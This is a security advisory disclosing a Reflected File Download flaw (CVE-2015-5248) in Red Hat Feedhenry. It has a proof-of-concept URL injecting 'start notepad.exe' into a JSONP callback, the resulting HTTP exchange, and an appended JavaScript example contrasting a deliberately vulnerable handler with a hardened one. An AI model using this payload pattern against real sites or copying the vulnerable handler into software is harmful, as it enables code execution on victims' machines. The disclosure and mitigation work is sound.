Trustwave SpiderLabs Security Advisory TWSL2015-017:
Reflected File Download in Red Hat Feedhenry

Published: 10/09/2015
Version: 1.0

Vendor: Red Hat Inc. (http://www.redhat.com/)
Product: Feedhenry Enterprise Mobile Application Platform
Product description:
Mobile Platform for Enterprise. Accelerate collaboration & development on Mobile Projects.

Finding 1: Reflected File Download in Red Hat Feedhenry
Credit: Maciej Grela of Trustwave
CVE: CVE-2015-5248

A particular request used by the Feedhenry mobile app hosting platform is vulnerable to Reflected File Download [1] in certain browsers. Consider the following URL:

https://example.feedhenry.com/box/srv/1.1/app/init/install.cmd?_callback=start%20notepad.exe%0d%0a&_jsonpdata={%22appid%22:%22%22,%22appkey%22:%22%22}

A similar URL is issued by the application code at initialization; the URL above has been reduced to the parameters needed for the attack. Please note that the appid and appkey values need to be valid (they are shown here as empty strings). Fetching this URL results in the following request/response pair:

8<------------------------------------------------
GET /box/srv/1.1/app/init/install.cmd?_callback=start%20notepad.exe%0d%0a&_jsonpdata={%22appid%22:%22%22,%22appkey%22:%22%22} HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: example.feedhenry.com
8<------------------------------------------------

Response:

8<------------------------------------------------
HTTP/1.1 200 OK
Date: Mon, 30 Mar 2015 13:01:28 GMT
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL" policyref="/box/p3p.xml"
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Last-Modified: Mon, 30 Mar 2015 13:01:28 GMT
ETag: ""
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 392

start notepad.exe
({"apptitle":"Fake App","domain":"example","firstTime":false,"hosts":{"debugCloudType":"node","debugCloudUrl":"https://debug-url.feedhenry.net","releaseCloudType":"node","releaseCloudUrl":"https://release-url.feedhenry.net"},"init":{"trackId":""},"status":"ok"});
8<------------------------------------------------

A response of this kind is interpreted by certain browsers (IE8 on Windows 7 [3] was tested as a proof of concept) as a file download originating from the example.feedhenry.com domain. The Same-Origin Policy offers no protection here: the attacker controls both the file name (install.cmd, the trailing path segment that the server accepts and the browser uses as the download name) and the file contents (the reflected _callback value). Because the injected CRLF (%0d%0a) pushes the JSONP payload onto a second line, the first line of the downloaded batch file is the attacker's command, and it is executed when the victim launches the downloaded file. This allows the attacker to run arbitrary code on the victim's machine.

Vendor Response:
Red Hat acknowledged the vulnerability and advised that it would be patched. However, at the time of publication the vendor has not provided a time-frame for the fix.

Remediation Steps:
Please refer to the Black Hat Europe 2014 talk [2] and the Trustwave SpiderLabs blog [1] for details about this class of vulnerability and ways to mitigate it.

Revision History:
03/31/2015 - Vulnerability disclosed to vendor
05/06/2015 - Vendor acknowledged vulnerability
07/16/2015 - Contacted vendor regarding status
08/17/2015 - Vendor advised that it should be patched within a week
08/20/2015 - Attempted to contact vendor regarding status
09/01/2015 - Attempted to contact vendor regarding status
09/18/2015 - Attempted to contact vendor regarding status
09/24/2015 - Attempted to contact vendor regarding status
10/01/2015 - Attempted to contact vendor regarding status
10/09/2015 - Advisory published

References:
1. https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/
2. https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
3. https://www.modern.ie/en-us/virtualization-tools

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper(R) cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose.
In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
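Worked example (added here; this is not part of the Trustwave advisory and not Feedhenry code): a JSONP handler modelled on the /box/srv/1.1/app/init request in Finding 1. vulnerableJsonp reflects the _callback parameter verbatim and tolerates a trailing path segment, reproducing the behaviour shown in the request/response pair above. hardenedJsonp applies the standard Reflected File Download mitigations: an exact path match so install.cmd is never served, a strict allow-list for the callback name, a fixed harmless filename via Content-Disposition, X-Content-Type-Options: nosniff, and a leading comment so the body never begins with attacker-supplied text. The endpoint constant, the function names and the trimmed payload are assumptions for illustration; the attack query is the one from the advisory.

```javascript
// Added example (not Feedhenry code): JSONP endpoint modelled on the
// /box/srv/1.1/app/init request in Finding 1, first reflecting, then hardened
// against Reflected File Download (RFD). Endpoint path, function names and the
// trimmed payload are assumptions for illustration.

const ENDPOINT = "/box/srv/1.1/app/init";

// Constructed stand-in for the init payload the real service returns.
const INIT_PAYLOAD = { apptitle: "Fake App", domain: "example", status: "ok" };

// A callback must look like a JavaScript identifier chain ("cb", "fh.init"):
// no whitespace, CR/LF, quotes, parentheses or shell metacharacters.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;
const CALLBACK_MAX_LEN = 64;

// Vulnerable handler: the callback is reflected verbatim and any path that
// starts with the endpoint is served. With _callback = "start notepad.exe\r\n"
// the body's first line is a Windows command, and a browser that treats the
// response as a download names the file after the URL's last segment.
function vulnerableJsonp(path, query) {
  if (!path.startsWith(ENDPOINT)) {
    return { status: 404, headers: {}, body: "" };
  }
  return {
    status: 200,
    headers: { "Content-Type": "text/javascript;charset=UTF-8" },
    body: `${query._callback}(${JSON.stringify(INIT_PAYLOAD)});`,
  };
}

// Hardened handler:
//  1. exact path match, so /app/init/install.cmd is not served;
//  2. callback must pass the allow-list regex and a length cap;
//  3. Content-Disposition pins the download name and extension (.txt), so a
//     browser that does save the response cannot produce an executable;
//  4. X-Content-Type-Options: nosniff disables content sniffing;
//  5. a leading comment keeps attacker-influenced text off the first bytes.
function hardenedJsonp(path, query) {
  if (path !== ENDPOINT) {
    return { status: 404, headers: {}, body: "" };
  }
  const cb = typeof query._callback === "string" ? query._callback : "";
  if (cb.length === 0 || cb.length > CALLBACK_MAX_LEN || !CALLBACK_RE.test(cb)) {
    return {
      status: 400,
      headers: { "Content-Type": "application/json; charset=UTF-8" },
      body: JSON.stringify({ status: "error", error: "invalid _callback" }),
    };
  }
  return {
    status: 200,
    headers: {
      "Content-Type": "application/javascript; charset=UTF-8",
      "Content-Disposition": 'attachment; filename="init.txt"',
      "X-Content-Type-Options": "nosniff",
    },
    body: `/**/${cb}(${JSON.stringify(INIT_PAYLOAD)});`,
  };
}

// Path and decoded query string from the advisory's proof-of-concept URL.
const POC_PATH = `${ENDPOINT}/install.cmd`;
const POC_QUERY = {
  _callback: "start notepad.exe\r\n",
  _jsonpdata: '{"appid":"","appkey":""}',
};

// Runs the attack request against both handlers plus a legitimate request
// against the hardened one, and returns all responses for inspection.
function demo() {
  return {
    vuln: vulnerableJsonp(POC_PATH, POC_QUERY),          // 200, command on line 1
    hardPath: hardenedJsonp(POC_PATH, POC_QUERY),        // 404, suffix rejected
    hardCallback: hardenedJsonp(ENDPOINT, POC_QUERY),    // 400, callback rejected
    hardGood: hardenedJsonp(ENDPOINT, { _callback: "fh.init" }), // 200
  };
}

const results = demo();
console.log("vulnerable, first line of download:", JSON.stringify(results.vuln.body.split("\r\n")[0]));
console.log("hardened, permissive path:", results.hardPath.status);
console.log("hardened, injected callback:", results.hardCallback.status);
console.log("hardened, legitimate callback:", results.hardGood.body);
```

The Content-Disposition header is the part that keeps working even when the other checks are bypassed: a legitimate <script src=...> include is unaffected, because browsers apply the header only to navigations and downloads, while anyone who does navigate to the URL receives a .txt file that Windows will not execute.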